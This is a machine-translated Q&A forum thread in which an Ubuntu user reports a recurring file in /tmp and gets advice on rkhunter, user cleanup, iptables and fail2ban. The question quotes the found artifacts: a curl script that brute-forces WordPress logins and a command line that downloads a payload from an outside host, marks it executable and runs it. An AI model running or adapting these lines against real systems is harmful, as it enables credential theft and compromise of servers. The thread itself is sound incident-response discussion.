我的 ubuntu tmp 文件夹中有异常文件。有人能解释一下吗?我可以采取哪些预防措施吗?
临时文件夹中有 2 个文件,名为 脚本和网址
当我纳米脚本文件:
#!/bin/bash
if curl -s --max-time 7 -d "log=$1" -d "pwd=$2" -d "wp-submit=Log+In"
"$3"/wp-login.php -i |grep -a "path=/wp-content/pl$
then
echo $3 $1 $2
fi
和纳米网址显示不可读的结果
此外,以下恶意进程正在 HTOP 命令上运行
\par 2 S 0.0 0.0 0:00.00 sh -c cd /tmp;rm -rf url*;cd /tmp;rm -rf url;curl -O socks5.so/url;chmod 777 url;./url
\par 4 S 0.0 0.0 0:00.00 ./url
查询进程id时:
#ls -al /proc/12186/exe
Output is:
someuser someuser 0 Jun 17 06:06 /proc/12186/exe -> /bin/dash
当我删除 TEMP 文件夹中的文件时,它不断重新生成,我该如何阻止这种情况。我相信它正在使用我的服务器攻击安装了 word press 的网站。
答案1
你曾经p0wned。要摆脱这个可能极其困难。
您可以下载软件包亨特, 更新它,
rkhunter --update
断开你的电脑与网络的连接,运行它:
rkhunter -c
如果它报告存在 rootkit,您最好的办法就是重新安装操作系统。事实上,rootkit 的存在通常表明对手很聪明,装备精良,虽然有可能与之抗衡,但需要大量的时间和技术能力,而这远远超出了本论坛的形式所能提供的范围。
如果没有 rootkit 的踪迹,那么您可以开始(您的 PC 仍处于离线状态)按照以下步骤清理您的 PC:
- 更改您的密码;
- 编辑 sudo 文件(使用 visudo)并删除所有非系统用户或您自己。
- 在 /etc/passwd 中使用登录 shell 搜索(最终的)其他用户,并将其删除。
- 删除这些用户的主目录。
- 完全禁用 ssh 守护进程。
- 通过以下方式设置手表通知等待在常见的系统文件上,例如 /var/log/wtmp。
- 设置 iptables 来记录所有的连接尝试,并且阻止所有的连接流量,除了 ssh 的非标准端口上的连接流量以及与您自己发起的现有连接相关的连接流量。
然后当你重新上网时,下载失败2ban无需安装,下线,启动 ssh 守护进程,安装 fail2ban。
现在将您的 ssh 更改为仅使用加密密钥,以禁止 root 登录和密码登录。现在您可以回到互联网,阅读一些 关于如何保护你的 Linux 机器的合理博客页面。